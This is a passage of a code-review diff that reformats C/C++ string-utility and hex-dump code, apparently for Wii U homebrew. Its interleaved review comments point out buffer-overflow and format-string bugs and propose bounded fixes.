if(!strChar || !dest)
|
||||
BOOL StringTools::char2wchar_t(const char *strChar, wchar_t *dest) {
|
||||
if (!strChar || !dest)
|
||||
return false;
|
||||
|
||||
int bt;
|
||||
int bt;
|
||||
bt = mbstowcs(dest, strChar, strlen(strChar));
|
||||
if (bt > 0) {
|
||||
dest[bt] = 0;
|
||||
@ -155,39 +155,39 @@ BOOL StringTools::char2wchar_t(const char * strChar, wchar_t * dest) {
|
||||
return false;
|
||||
}
|
||||
|
||||
int32_t StringTools::strtokcmp(const char * string, const char * compare, const char * separator) {
|
||||
if(!string || !compare)
|
||||
int32_t StringTools::strtokcmp(const char *string, const char *compare, const char *separator) {
|
||||
if (!string || !compare)
|
||||
return -1;
|
||||
|
||||
char TokCopy[512];
|
||||
strncpy(TokCopy, compare, sizeof(TokCopy));
|
||||
TokCopy[511] = '\0';
|
||||
|
||||
char * strTok = strtok(TokCopy, separator);
|
||||
char *strTok = strtok(TokCopy, separator);
|
||||
|
||||
while (strTok != NULL) {
|
||||
if (strcasecmp(string, strTok) == 0) {
|
||||
return 0;
|
||||
}
|
||||
strTok = strtok(NULL,separator);
|
||||
strTok = strtok(NULL, separator);
|
||||
}
|
||||
|
||||
return -1;
|
||||
}
|
||||
|
||||
int32_t StringTools::strextcmp(const char * string, const char * extension, char seperator) {
|
||||
if(!string || !extension)
|
||||
int32_t StringTools::strextcmp(const char *string, const char *extension, char seperator) {
|
||||
if (!string || !extension)
|
||||
return -1;
|
||||
|
||||
char *ptr = strrchr(string, seperator);
|
||||
if(!ptr)
|
||||
if (!ptr)
|
||||
return -1;
|
||||
|
||||
return strcasecmp(ptr + 1, extension);
|
||||
}
|
||||
|
||||
|
||||
std::vector<std::string> StringTools::stringSplit(const std::string & inValue, const std::string & splitter) {
|
||||
std::vector<std::string> StringTools::stringSplit(const std::string &inValue, const std::string &splitter) {
|
||||
std::string value = inValue;
|
||||
std::vector<std::string> result;
|
||||
while (true) {
|
||||
@ -202,7 +202,7 @@ std::vector<std::string> StringTools::stringSplit(const std::string & inValue, c
|
||||
result.push_back("");
|
||||
break;
|
||||
}
|
||||
if(index + splitter.size() > value.length()) {
|
||||
if (index + splitter.size() > value.length()) {
|
||||
break;
|
||||
}
|
||||
value = value.substr(index + splitter.size(), value.length());
|
||||
@ -211,39 +211,39 @@ std::vector<std::string> StringTools::stringSplit(const std::string & inValue, c
|
||||
}
|
||||
|
||||
|
||||
const char * StringTools::FullpathToFilename(const char *path) {
|
||||
if(!path)
|
||||
return path;
|
||||
const char *StringTools::FullpathToFilename(const char *path) {
|
||||
if (!path)
|
||||
return path;
|
||||
|
||||
const char * ptr = path;
|
||||
const char * Filename = ptr;
|
||||
const char *ptr = path;
|
||||
const char *Filename = ptr;
|
||||
|
||||
while(*ptr != '\0') {
|
||||
if(ptr[0] == '/' && ptr[1] != '\0')
|
||||
Filename = ptr+1;
|
||||
while (*ptr != '\0') {
|
||||
if (ptr[0] == '/' && ptr[1] != '\0')
|
||||
Filename = ptr + 1;
|
||||
|
||||
++ptr;
|
||||
}
|
||||
|
||||
return Filename;
|
||||
++ptr;
|
||||
}
|
||||
|
||||
return Filename;
|
||||
}
|
||||
|
||||
void StringTools::RemoveDoubleSlashs(std::string &str) {
|
||||
uint32_t length = str.size();
|
||||
uint32_t length = str.size();
|
||||
|
||||
//! clear path of double slashes
|
||||
for(uint32_t i = 1; i < length; ++i) {
|
||||
if(str[i-1] == '/' && str[i] == '/') {
|
||||
str.erase(i, 1);
|
||||
i--;
|
||||
length--;
|
||||
}
|
||||
//! clear path of double slashes
|
||||
for (uint32_t i = 1; i < length; ++i) {
|
||||
if (str[i - 1] == '/' && str[i] == '/') {
|
||||
str.erase(i, 1);
|
||||
i--;
|
||||
length--;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
// You must free the result if result is non-NULL.
|
||||
char * StringTools::str_replace(char *orig, char *rep, char *with) {
|
||||
char *StringTools::str_replace(char *orig, char *rep, char *with) {
|
||||
char *result; // the return string
|
||||
char *ins; // the next insert point
|
||||
char *tmp; // varies
|
||||
@ -268,7 +268,7 @@ char * StringTools::str_replace(char *orig, char *rep, char *with) {
|
||||
ins = tmp + len_rep;
|
||||
}
|
||||
|
||||
tmp = result = (char*)malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
||||
tmp = result = (char *) malloc(strlen(orig) + (len_with - len_rep) * count + 1);
|
||||
|
||||
if (!result)
|
||||
return NULL;
|
||||
|
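Review bot: `fmt`, `wfmt`, `strprintf` and `strfmt` all format into fixed 512-byte static buffers with `vsprintf`, which has no length bound, so any format/argument combination that expands past 511 characters overruns `strChar` or `tmp`; the reformatting keeps that as-is. Each call should become `vsnprintf(tmp, sizeof(tmp), format, va)` (and `vsnprintf(strChar, sizeof(strChar), format, va)` in `fmt`), with the return value compared against `sizeof(tmp)` so truncation is reported rather than silently accepted. In `wfmt` the conversion length is clamped to 512 but `strWChar[bt] = 0` then writes index 512 when the full buffer was used, so the clamp should be 511 (or the array one element larger); `char2wchar_t` has the same unbounded write through `mbstowcs(dest, strChar, strlen(strChar))`, which bounds by source length rather than `dest` capacity. The static buffers (and `strtok` in `strtokcmp`) also make these functions non-reentrant, which is worth a comment on each declaration.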
@ -32,20 +32,33 @@
|
||||
|
||||
class StringTools {
|
||||
public:
|
||||
static BOOL EndsWith(const std::string& a, const std::string& b);
|
||||
static const char * byte_to_binary(int32_t x);
|
||||
static std::string removeCharFromString(std::string& input,char toBeRemoved);
|
||||
static const char * fmt(const char * format, ...);
|
||||
static const wchar_t * wfmt(const char * format, ...);
|
||||
static int32_t strprintf(std::string &str, const char * format, ...);
|
||||
static std::string strfmt(const char * format, ...);
|
||||
static BOOL char2wchar_t(const char * src, wchar_t * dest);
|
||||
static int32_t strtokcmp(const char * string, const char * compare, const char * separator);
|
||||
static int32_t strextcmp(const char * string, const char * extension, char seperator);
|
||||
static BOOL EndsWith(const std::string &a, const std::string &b);
|
||||
|
||||
static const char *byte_to_binary(int32_t x);
|
||||
|
||||
static std::string removeCharFromString(std::string &input, char toBeRemoved);
|
||||
|
||||
static const char *fmt(const char *format, ...);
|
||||
|
||||
static const wchar_t *wfmt(const char *format, ...);
|
||||
|
||||
static int32_t strprintf(std::string &str, const char *format, ...);
|
||||
|
||||
static std::string strfmt(const char *format, ...);
|
||||
|
||||
static BOOL char2wchar_t(const char *src, wchar_t *dest);
|
||||
|
||||
static int32_t strtokcmp(const char *string, const char *compare, const char *separator);
|
||||
|
||||
static int32_t strextcmp(const char *string, const char *extension, char seperator);
|
||||
|
||||
static char *str_replace(char *orig, char *rep, char *with);
|
||||
static const char * FullpathToFilename(const char *path);
|
||||
|
||||
static const char *FullpathToFilename(const char *path);
|
||||
|
||||
static void RemoveDoubleSlashs(std::string &str);
|
||||
static std::vector<std::string> stringSplit(const std::string & value, const std::string & splitter);
|
||||
|
||||
static std::vector<std::string> stringSplit(const std::string &value, const std::string &splitter);
|
||||
};
|
||||
|
||||
#endif /* __STRING_TOOLS_H */
|
||||
|
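Review bot: The reformatted declarations carry no documentation, and the contract callers most need — `str_replace` returns heap memory the caller must `free()`, which the .cpp states only above the definition — is not visible in the header where callers read it. Add `// Returns a malloc'd string (or NULL on failure); caller must free() the result.` above `static char *str_replace(char *orig, char *rep, char *with);`, and mark `fmt` and `wfmt` as returning a pointer into a shared static buffer that the next call overwrites, so callers know the result is not reentrant or persistent. The parameter is spelled `seperator` in `strextcmp` but `separator` in `strtokcmp`; a formatting pass is the natural place to make the two agree.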
@ -1,4 +1,5 @@
|
||||
#pragma once
|
||||
|
||||
#include <whb/log.h>
|
||||
#include <string.h>
|
||||
|
||||
|
@ -7,31 +7,31 @@
|
||||
#include "utils/logger.h"
|
||||
|
||||
// https://gist.github.com/ccbrown/9722406
|
||||
void dumpHex(const void* data, size_t size) {
|
||||
void dumpHex(const void *data, size_t size) {
|
||||
char ascii[17];
|
||||
size_t i, j;
|
||||
ascii[16] = '\0';
|
||||
WHBLogPrintf("0x%08X (0x0000): ", data);
|
||||
for (i = 0; i < size; ++i) {
|
||||
WHBLogWritef("%02X ", ((unsigned char*)data)[i]);
|
||||
if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
|
||||
ascii[i % 16] = ((unsigned char*)data)[i];
|
||||
WHBLogWritef("%02X ", ((unsigned char *) data)[i]);
|
||||
if (((unsigned char *) data)[i] >= ' ' && ((unsigned char *) data)[i] <= '~') {
|
||||
ascii[i % 16] = ((unsigned char *) data)[i];
|
||||
} else {
|
||||
ascii[i % 16] = '.';
|
||||
}
|
||||
if ((i+1) % 8 == 0 || i+1 == size) {
|
||||
if ((i + 1) % 8 == 0 || i + 1 == size) {
|
||||
WHBLogWritef(" ");
|
||||
if ((i+1) % 16 == 0) {
|
||||
if ((i + 1) % 16 == 0) {
|
||||
WHBLogWritef("| %s \n", ascii);
|
||||
if(i + 1 < size) {
|
||||
DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1,i+1);
|
||||
if (i + 1 < size) {
|
||||
DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1);
|
||||
}
|
||||
} else if (i+1 == size) {
|
||||
ascii[(i+1) % 16] = '\0';
|
||||
if ((i+1) % 16 <= 8) {
|
||||
} else if (i + 1 == size) {
|
||||
ascii[(i + 1) % 16] = '\0';
|
||||
if ((i + 1) % 16 <= 8) {
|
||||
WHBLogWritef(" ");
|
||||
}
|
||||
for (j = (i+1) % 16; j < 16; ++j) {
|
||||
for (j = (i + 1) % 16; j < 16; ++j) {
|
||||
WHBLogWritef(" ");
|
||||
}
|
||||
WHBLogWritef("| %s \n", ascii);
|
||||
|
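Review bot: `WHBLogPrintf("0x%08X (0x0000): ", data)` and `DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", data + i + 1, i + 1)` pass a `const void *` to `%X` and a `size_t` to `%04X`, a format/argument mismatch that is undefined behavior, and `data + i + 1` is arithmetic on `void *`, which only GNU C accepts. Declare `const unsigned char *bytes = (const unsigned char *) data;` once at the top, then use `WHBLogPrintf("0x%08X (0x0000): ", (unsigned int) (uintptr_t) bytes);` and `DEBUG_FUNCTION_LINE("0x%08X (0x%04X); ", (unsigned int) (uintptr_t) (bytes + i + 1), (unsigned int) (i + 1));`; `bytes[i]` then also replaces the four repeated `((unsigned char *) data)[i]` casts. If the logging functions behind `DEBUG_FUNCTION_LINE` (defined in utils/logger.h, outside this hunk) carry `__attribute__((format(printf, ...)))`, the compiler will flag this class of mismatch. dumpHex's body continues past the end of the hunk.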
@ -7,12 +7,12 @@
|
||||
extern "C" {
|
||||
#endif
|
||||
|
||||
#define LIMIT(x, min, max) \
|
||||
({ \
|
||||
typeof( x ) _x = x; \
|
||||
typeof( min ) _min = min; \
|
||||
typeof( max ) _max = max; \
|
||||
( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \
|
||||
#define LIMIT(x, min, max) \
|
||||
({ \
|
||||
typeof( x ) _x = x; \
|
||||
typeof( min ) _min = min; \
|
||||
typeof( max ) _max = max; \
|
||||
( ( ( _x ) < ( _min ) ) ? ( _min ) : ( ( _x ) > ( _max ) ) ? ( _max) : ( _x ) ); \
|
||||
})
|
||||
|
||||
#define DegToRad(a) ( (a) * 0.01745329252f )
|
||||
@ -31,7 +31,7 @@ extern "C" {
|
||||
#define le64(i) ((((uint64_t)le32((i) & 0xFFFFFFFFLL)) << 32) | ((uint64_t)le32(((i) & 0xFFFFFFFF00000000LL) >> 32)))
|
||||
|
||||
//Needs to have log_init() called beforehand.
|
||||
void dumpHex(const void* data, size_t size);
|
||||
void dumpHex(const void *data, size_t size);
|
||||
|
||||
#ifdef __cplusplus
|
||||
}
|
||||
|